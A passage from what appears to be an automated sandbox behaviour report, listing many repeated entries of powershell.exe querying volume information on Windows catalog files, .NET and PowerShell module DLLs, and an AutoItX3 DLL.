      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0214~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0214~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0413~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Windows.StartLayout.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.Windows.StartLayout.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0214~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package04~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Whea\Microsoft.Windows.Whea.WheaMemoryPolicy.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0210~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package04112~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsSearch\Microsoft.WindowsSearch.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.WindowsSearch.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsSearch.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC\Microsoft.mshtml\7.0.3300.0__b03f5f7f11d50a3a\Microsoft.mshtml.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0214~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0214~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
